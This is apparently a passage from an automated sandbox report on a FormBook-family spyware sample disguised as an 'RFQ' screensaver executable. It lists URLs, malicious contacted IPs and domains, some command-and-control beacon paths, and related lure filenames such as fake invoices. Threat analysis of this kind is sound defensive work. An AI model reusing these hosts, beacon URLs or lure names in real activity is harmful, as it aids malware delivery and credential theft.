                            https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/profesionalus-hostingas/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominioreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/talpinimo-planai/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resellreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sslreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.valentinaetommaso.it/page-not-found-404/ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://assets.iv.lt/footer.htmlreplace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vpsreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.netreplace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/neribotas-svetainiu-talpinimas/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/svetainiu-kurimo-irankis/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendasreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.ecosia.org/newtab/replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0RFQ-25251.scr.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partnersreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/0u/0ua/0ua55l.js?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/el-pasto-filtras/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ac.ecosia.org/autocomplete?q=replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seoreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/vps-serveriai/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correoreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://klientams.iv.lt/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://arsys.es/css/parking2.cssreplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 0000000F.00000002.3743671082.00000000078F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campareplace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.solesense.proZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3741723282.00000000050F8000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=rereplace.exe, 0000000F.00000002.3741778004.0000000003D0A000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.00000000034EA000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.iv.lt/sertifikatai/replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            162.240.81.18
                            		aprovapapafox.comUnited States
                            		46606UNIFIEDLAYER-AS-1UStrue
                            103.93.125.69
                            		vf3ba6qx.as22566.comHong Kong
                            		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                            79.98.25.1
                            		www.maxiwalls.comLithuania
                            		62282RACKRAYUABRakrejusLTtrue
                            217.76.128.34
                            		www.colchondealquiler.comSpain
                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                            178.211.137.59
                            		www.skibinscy-finanse.plUkraine
                            		31214TIS-DIALOG-ASRUtrue
                            3.125.172.46
                            		lb.webnode.ioUnited States
                            		16509AMAZON-02UStrue
                            64.190.62.22
                            		www.paydayloans3.shopUnited States
                            		11696NBS11696UStrue
                            52.175.38.24
                            		fix01.pfw.djamxtvyk.cloudland3.comUnited States
                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            203.161.46.103
                            		www.fairmarty.topMalaysia
                            		45899VNPT-AS-VNVNPTCorpVNtrue
                            91.195.240.19
                            		parkingpage.namecheap.comGermany
                            		47846SEDO-ASDEtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1441277
                            Start date and time:2024-05-14 12:49:24 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:2
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:RFQ-25251.scr.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@11/2@18/10
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 90%
                            • Number of executed functions: 126
                            • Number of non-executed functions: 288
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            12:50:15API Interceptor1x Sleep call for process: RFQ-25251.scr.exe modified
                            12:51:21API Interceptor9329879x Sleep call for process: replace.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            162.240.81.18RCoAOiAqk7.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.tintasmaiscor.com/a42m/
                            SecuriteInfo.com.Win64.PWSX-gen.13670.618.exeGet hashmaliciousFormBookBrowse
                            • www.tavernadoheroi.store/8cuu/
                            TT swift copy.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.tintasmaiscor.com/a42m/
                            MBL Draft-Shipment Documents.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.tintasmaiscor.com/a42m/
                            Credit confirmation.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.tintasmaiscor.com/a42m/
                            ai1qjpaw6l.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.tintasmaiscor.com/a42m/
                            MR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.aprovapapafox.com/aleu/
                            letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.aprovapapafox.com/aleu/
                            STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • www.tavernadoheroi.store/3g97/?-b=i+yp5adQUIH0VEgsLjLQbdLWEf0YTlGSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmzexSq5i7d/OJbgFtFBHCclBl82tv+w==&iJdtI=UBp4nvRH
                            Order List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.tintasmaiscor.com/a42m/
                            103.93.125.69Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.86597.vip/op6t/
                            098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.86597.vip/z912/
                            MR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.83634.cn/aleu/
                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.86597.vip/op6t/
                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.83634.cn/aleu/
                            confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.86597.vip/op6t/
                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.83634.cn/aleu/
                            79.98.25.1098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.maxiwalls.com/z912/
                            2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.maxiwalls.com/aleu/
                            Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.maxiwalls.com/udud/
                            Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.maxiwalls.com/udud/
                            International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                            • www.noxnoxhome.com/ve92/?KVvTZtEp=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNSm79P5Sc0NLZLCPEw==&ixo=GL0X
                            International Bank transfer.exeGet hashmaliciousFormBookBrowse
                            • www.noxnoxhome.com/ve92/?UTU=yvUt0Xc&NtBTjpl=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNReS0v1pTCwd
                            00726736625241525.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.christmatoy.com/6qne/?T6d7v=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe&P9I=5Nqp
                            Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                            00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                            Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                            • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            parkingpage.namecheap.comSecuriteInfo.com.Win64.PWSX-gen.13670.618.exeGet hashmaliciousFormBookBrowse
                            • 91.195.240.19
                            New QuotePrice listing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 91.195.240.19
                            Beauty_Stem_Invoice.docGet hashmaliciousFormBookBrowse
                            • 91.195.240.19
                            vnc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            pedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            Stolprende.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 91.195.240.19
                            WvwNJkZ8jcQuUnb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 91.195.240.19
                            www.skibinscy-finanse.plMR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 178.211.137.59
                            letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 178.211.137.59
                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 178.211.137.59
                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 178.211.137.59
                            COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 178.211.137.59
                            INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 178.211.137.59
                            INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                            • 178.211.137.59
                            HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                            • 178.211.137.59
                            www.maxiwalls.comFactura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            MR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            www.paydayloans3.shopMR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 64.190.62.22
                            letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 64.190.62.22
                            STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                            • 64.190.62.22
                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 64.190.62.22
                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 64.190.62.22
                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 64.190.62.22
                            FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 64.190.62.22
                            INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 64.190.62.22
                            shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 64.190.62.22

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            RACKRAYUABRakrejusLT098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            2A027vkkdn.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            MR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 79.98.25.1
                            PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            prnportccy.vbsGet hashmaliciousFormBookBrowse
                            • 194.135.87.0
                            INQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 79.98.25.1
                            UNIFIEDLAYER-AS-1USRCoAOiAqk7.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 162.240.81.18
                            shipment airway bill_PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 192.185.166.221
                            SecuriteInfo.com.Win64.PWSX-gen.13670.618.exeGet hashmaliciousFormBookBrowse
                            • 162.240.81.18
                            YPR010098- Quote- PFI.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 192.185.96.244
                            Purchase Order.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 162.214.80.31
                            TT swift copy.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 162.240.81.18
                            file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 162.241.61.23
                            PO_202405014.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 192.185.143.105
                            TS-240514-UF7.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 192.185.46.57
                            https://dlr.xng.mybluehost.me/Tsho/net/login.phpGet hashmaliciousUnknownBrowse
                            • 50.87.170.192
                            DNC-ASDimensionNetworkCommunicationLimitedHKpedido comprado.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.124.160
                            orden de carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.124.160
                            Factura1-FVO-2024000893.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.125.69
                            098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.125.69
                            rOrden-de-carga.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.125.68
                            MR-239-1599-A.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 103.93.125.69
                            Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 147.92.36.247
                            factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.125.69
                            RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 103.93.125.69
                            confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 103.93.125.69
